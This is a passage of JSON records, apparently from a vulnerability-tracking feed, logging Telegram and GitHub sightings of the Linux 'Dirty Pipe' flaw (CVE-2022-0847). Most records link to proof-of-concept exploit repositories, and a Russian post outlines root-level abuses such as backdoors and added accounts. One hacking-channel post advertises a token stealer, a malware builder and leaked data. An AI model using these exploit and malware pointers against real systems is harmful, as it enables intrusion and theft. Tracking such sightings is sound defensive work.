"CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/10572", "content": "https://github.com/imfiver/CVE-2022-0847", "creation_timestamp": "2022-03-13T08:05:01.000000Z"}, {"uuid": "0a55d56e-e753-447d-af7f-e710a033f097", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/1237", "content": "DirtyPipe for Android\n\n#DirtyPipe #Android #Mobile #Exploit #Malware\n#CVE-2022-0847 #security #Hacking #Bugbounty\n\nhttps://reconshell.com/dirtypipe-for-android/", "creation_timestamp": "2022-04-05T13:54:44.000000Z"}, {"uuid": "e5d1debd-35e4-40b2-bc59-11f72c69b3d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/807", "content": "Today's Updates\n\n1. Koh: The Token Stealer\n2. Slient-Doc-Pdf-Exploit-Builder-Fud-Malware-Cve\n3. CVE-2022-34265 - PoC verification of Django vulnerability\n4. Papaya - NoSQL Injection Tool to bypass login forms & extract usernames/passwords using regular expressions.\n5. New Stable Mirror for Tor2Door Exploring\n6. indonesianship.com Leak\n7. Arbitech.com Leak\n8. CVE-2022-0847 SUID Shell Backdoor\n9. Sql injection tutorial\n10. SMTP Connections\n\nAll Updates are on \ud83d\udc49\ud83c\udffb\ud83d\udc49\ud83c\udffb https://forum.hackbyte.org", "creation_timestamp": "2022-07-08T15:29:04.000000Z"}, {"uuid": "118e15ee-ee31-4e28-8487-9034061e8140", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/NeKaspersky/1955", "content": "\u0412 Linux \u0438 Android \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. \n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2022-0847) \u0432 Linux. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441 \u043d\u0435\u043e\u0431\u044b\u0447\u0430\u0439\u043d\u043e\u0439 \u043b\u0435\u0433\u043a\u043e\u0441\u0442\u044c\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432, \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0438\u043b\u0438 \u0434\u0432\u043e\u0438\u0447\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 \u0438\u043b\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c\u0438. \n\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0442\u043e\u0440\u0430 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432 Ma\u043a\u0441 \u041a\u0435\u043b\u043b\u0435\u0440\u043c\u0430\u043d\u043d \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0435\u043f\u043e\u043b\u0430\u0434\u043e\u043a.  \u041e\u043d\u0438 \u0431\u044b\u043b\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0435\u0447\u043d\u043e \u043f\u043e\u044f\u0432\u043b\u044f\u043b\u0438\u0441\u044c \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435. \u041f\u043e\u0442\u0440\u0430\u0442\u0438\u0432 \u043d\u0430 \u044d\u0442\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u0435\u0441\u044f\u0446\u0435\u0432, \u043e\u043d \u0441\u043c\u043e\u0433 \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u0431\u044b\u043b\u0438 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u044f\u0434\u0440\u0435 Linux. \u0412\u0441\u0451 \u044d\u0442\u043e \u043d\u0430\u0442\u043e\u043b\u043a\u043d\u0443\u043b\u043e \u0435\u0433\u043e \u043d\u0430 \u043c\u044b\u0441\u043b\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0438 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445. \u041e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043b\u044e\u0431\u043e\u043c\u0443, \u0443 \u043a\u043e\u0433\u043e \u0435\u0441\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043d\u0430\u0438\u043c\u0435\u043d\u0435\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \"nobody\", \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043a\u043b\u044e\u0447 SSH \u043a \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u043e\u043a\u043d\u043e SSH \u0441 \u043f\u043e\u043b\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root. \u0421\u0430\u043c \u041a\u0435\u043b\u043b\u0435\u0440\u043c\u0430\u043d \u043d\u0430\u0437\u0432\u0430\u043b \u0435\u0435 Dirty Pipe.\n\n\u041e\u043d \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0438 \u0435\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u043e\u0442\u0443. \u0410 \u0442\u0430\u043a\u0436\u0435 \u043e\u043d\u0438 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438, \u0447\u0442\u043e \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043a\u043b\u044e\u0447\u0430 SSH \u0431\u044b\u043b\u043e \u043b\u0438\u0448\u044c \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u043c\u043d\u043e\u0433\u0438\u0445 \u0437\u043b\u043e\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u044f\u0442\u044c \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u0414\u0440\u0443\u0433\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u044b\u0435 Dirty Pipe, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0432 \u0441\u0435\u0431\u044f: \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f cron, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0435\u0433\u043e \u043a\u0430\u043a \u0431\u044d\u043a\u0434\u043e\u0440; \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 /etc/passwd + /etc/shadow (\u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 root); \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0438\u043b\u0438 \u0434\u0432\u043e\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430.\n\n\u041e\u0434\u043d\u0430\u043a\u043e Dirty Pipe \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0431\u043e\u043b\u0435\u0435 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u043e\u0439, \u0432\u0435\u0434\u044c \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u0430\u0442\u044c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c Linux, \u043d\u043e \u0438 \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430 \u0431\u0430\u0437\u0435 \u043b\u044e\u0431\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 Android, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u044f\u0434\u0440\u0430 Linux. \u041a\u0430\u043a \u0437\u0430\u044f\u0432\u0438\u043b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c Lookout, Dirty Pipe \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u043d\u0430 \u041e\u0421 Android \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442 \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043e\u043d\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u044b.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 \u044f\u0434\u0440\u0435 Linux \u0432\u0435\u0440\u0441\u0438\u0438 5.8, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u043c \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2020 \u0433\u043e\u0434\u0430, \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0438\u0441\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 5.16.11, 5.15.25 \u0438 5.10.102. \u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u044b\u043b\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b 23 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u0434\u043b\u044f Linux \u0438 24 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u0434\u043b\u044f \u044f\u0434\u0440\u0430 Android.\n@NeKaspersky", "creation_timestamp": "2022-03-08T14:47:13.000000Z"}, {"uuid": "20ecc38c-fa15-4ac4-9603-7d2d74fbbceb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/gormih/faa271309205184d220f2eeb6ac8fb4e", "content": "", "creation_timestamp": "2026-04-30T10:37:23.000000Z"}, {"uuid": "3550459d-8ddb-4e86-b7ea-49843d5317fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/webcpu/7c928d4740d4b4330646df1041a5ee1e", "content": "", "creation_timestamp": "2026-04-30T08:15:26.000000Z"}, {"uuid": "013657d9-ac48-4d3c-b4e7-ed032d5575d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/androidMalware/1471", "content": "Dirty Pipe vulnerability affects Linux Kernel since 5.8 including Android (CVE-2022-0847) \nThis issue leads to LPE because unprivileged processes can inject code into root processes\nDetails and PoC exploit: https://dirtypipe.cm4all.com/\nDemo of exploitation: https://www.instagram.com/p/Ca2JIOjgwF6/", "creation_timestamp": "2022-08-24T06:30:28.000000Z"}, {"uuid": "a3e5b1b3-8b80-4142-ac96-6933ce0528f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "exploited", "source": "https://t.me/AmericaFirstAudits/23546", "content": "Researchers warn of a new vulnerability (CVE-2022-0847) in the Linux kernel, dubbed \"Dirty Pipe,\" which could allow an attacker to overwrite arbitrary data and take complete control of a system.\n\nDetails: https://thehackernews.com/2022/03/researchers-warn-of-linux-kernel-dirty.html", "creation_timestamp": "2022-03-11T19:27:09.000000Z"}, {"uuid": "763c9d35-7758-4b6e-b43c-61281f1f73c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3295", "content": "https://www.youtube.com/watch?v=gHKmmVZAaFo\n\n#DirtyPipe\n\nNew Privilege Escalation\n\nhttps://dirtypipe.cm4all.com/\n\nhttps://github.com/bbaranoff/cve-2022-0847", "creation_timestamp": "2022-03-08T00:45:32.000000Z"}, {"uuid": "1a61260e-76e8-4807-849c-76ee6e59990b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/1422", "content": "https://www.youtube.com/watch?v=gHKmmVZAaFo\n\n#DirtyPipe\n\nNew Privilege Escalation\n\nhttps://dirtypipe.cm4all.com/\n\nhttps://github.com/bbaranoff/cve-2022-0847", "creation_timestamp": "2022-03-08T01:56:23.000000Z"}, {"uuid": "fe65f03c-98bf-4d5f-9ae7-4be9a76de0d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1785", "content": "#CVE-2022\n\nCVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability\n\nhttps://github.com/ahrixia/CVE_2022_0847\n\n@BlueRedTeam", "creation_timestamp": "2022-03-08T16:35:06.000000Z"}, {"uuid": "b2035e4a-e516-4eaf-90cf-f80398930ba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/thehackernews/1956", "content": "Researchers warn of a new vulnerability (CVE-2022-0847) in the Linux kernel, dubbed \"Dirty Pipe,\" which could allow an attacker to overwrite arbitrary data and take complete control of a system.\n\nDetails: https://thehackernews.com/2022/03/researchers-warn-of-linux-kernel-dirty.html", "creation_timestamp": "2022-03-08T08:46:39.000000Z"}, {"uuid": "59539553-771d-48bf-bd09-b40eec9cb330", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2206", "content": "#CVE-2022\n\nAn eBPF detection program for CVE-2022-0847\n\nhttps://github.com/airbus-cert/dirtypipe-ebpf_detection\n\n@BlueRedTeam", "creation_timestamp": "2022-07-05T23:24:01.000000Z"}, {"uuid": "dfc7f041-bb9a-4895-a70f-fd0d8da247d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1786", "content": "#CVE-2022\n\nImplementation of Max Kellermann's exploit for CVE-2022-0847\n\nhttps://github.com/0xIronGoat/dirty-pipe\n\n@BlueRedTeam", "creation_timestamp": "2022-03-08T17:01:55.000000Z"}, {"uuid": "9be1447e-e5e0-4d24-8e72-8ff31209c7e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1787", "content": "#CVE-2022\n\nBash script to check for CVE-2022-0847 \\\"Dirty Pipe\\\"\n\nhttps://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker\n\n@BlueRedTeam", "creation_timestamp": "2022-03-08T22:15:14.000000Z"}, {"uuid": "a724b3e4-af54-43da-8499-7f086b55da92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/merna_hade_hack/134", "content": "Making Sense of the Dirty Pipe Vulnerability (CVE-2022-0847)\n\u00a0\u0641\u064a \u064a\u0648\u0645 \u0627\u0644\u0627\u062b\u0646\u064a\u0646 \u0627\u0644\u0633\u0627\u0628\u0639 \u0645\u0646 \u0645\u0627\u0631\u0633 \u062a\u0645 \u0627\u0644\u0643\u0634\u0641 \u0639\u0644\u0646\u064b\u0627 \u0639\u0646 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a Linux Kernel \u0648\u0627\u0644\u062a\u064a \u0642\u062f \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a.\u00a0\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u0627\u0643\u062a\u0634\u0641\u0647\u0627 Max Kellermann \u0648\u0627\u0644\u062a\u064a \u064a\u0637\u0644\u0642 \u0639\u0644\u064a\u0647\u0627 \u0627\u0633\u0645 \"\u00a0Dirty Pipe\u00a0\" \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 Linux Kernel 5.8 \u0648\u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0623\u062d\u062f\u062b (\u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 Android) \u0643\u0645\u0627 \u0630\u0643\u0631 \u0645\u0627\u0643\u0633 \u0641\u064a \u0643\u062a\u0627\u0628\u0647 \u064a\u0645\u0643\u0646 \u0627\u0646 \u064a\u0633\u0645\u062d \u0627\u0644\u062e\u0644\u0644 \u0644\u0623\u064a \u0634\u062e\u0635 \u0644\u062f\u064a\u0647 \u062d\u0642 \u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0642\u0631\u0627\u0621\u0629 \u0639\u0644\u0649 \u0646\u0638\u0627\u0645 \u0644\u0643\u062a\u0627\u0628\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0639\u0634\u0648\u0627\u0626\u064a\u0629 \u0641\u064a \u0645\u0644\u0641\u0627\u062a \u0639\u0634\u0648\u0627\u0626\u064a\u0629.\u00a0\u0633\u0646\u0642\u0648\u0645 \u0628\u062a\u062d\u0644\u064a\u0644 \u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0628\u0639\u0645\u0642 \u0648\u0646\u0648\u0636\u062d \u0643\u064a\u0641 \u064a\u0639\u0645\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0639\u0644\u0649 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0628\u0646\u062c\u0627\u062d.\n\u0642\u0628\u0644 \u0627\u0644\u0627\u0646\u062a\u0642\u0627\u0644 \u0645\u0628\u0627\u0634\u0631\u0629 \u0625\u0644\u0649 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629 \u060c \u062f\u0639\u0646\u0627 \u0646\u062a\u0639\u0631\u0641 \u0639\u0644\u0649 \u0628\u0639\u0636 \u0627\u0644\u0645\u0635\u0637\u0644\u062d\u0627\u062a \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629:", "creation_timestamp": "2022-03-17T02:40:37.000000Z"}, {"uuid": "5f9b7273-8abb-40e9-a272-4107bb299e7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1791", "content": "#CVE-2022\n\nDirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well)\n\nhttps://github.com/MRNIKO1/Dirtypipe-exploit\n\n@BlueRedTeam", "creation_timestamp": "2022-03-09T10:31:19.000000Z"}, {"uuid": "3af16936-334e-473c-835e-8c619c323992", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1792", "content": "#CVE-2022\n\nA root exploit for CVE-2022-0847 (Dirty Pipe)\n\nhttps://github.com/babyshen/CVE-2022-0847\n\n@BlueRedTeam", "creation_timestamp": "2022-03-10T08:07:20.000000Z"}, {"uuid": "9588bf7e-53e9-40ce-815d-1082682322df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1803", "content": "#CVE-2022\n\nCVE-2022-0847 POC\n\nhttps://github.com/breachnix/dirty-pipe-poc\n\n@BlueRedTeam", "creation_timestamp": "2022-03-14T17:39:03.000000Z"}, {"uuid": "01e7d478-968f-4bd5-a0c8-3817a2fab4c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2552", "content": "#CVE-2022\nCVE-2022-36537\n\nhttps://github.com/agnihackers/CVE-2022-36537-EXPLOIT\n\nPOC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability.\n\nhttps://github.com/Malwareman007/CVE-2022-21907\n\nPOC of CVE-2022-36537\nhttps://github.com/Malwareman007/CVE-2022-36537\n\nDirty Pipe - CVE-2022-0847\nhttps://github.com/tmoneypenny/CVE-2022-0847\n\nProof of concept of CVE-2022-24086\n\nhttps://github.com/pescepilota/CVE-2022-24086\n\n@BlueRedTeam", "creation_timestamp": "2023-01-07T04:51:48.000000Z"}, {"uuid": "50c3baf6-c68f-431f-b208-275d92eb712c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1438", "content": "https://github.com/h4ckm310n/CVE-2022-0847-eBPF\n#github", "creation_timestamp": "2023-11-05T14:47:20.000000Z"}, {"uuid": "5d996163-612e-4027-aa5a-5461e636f233", "vulnerability_lookup_origin": 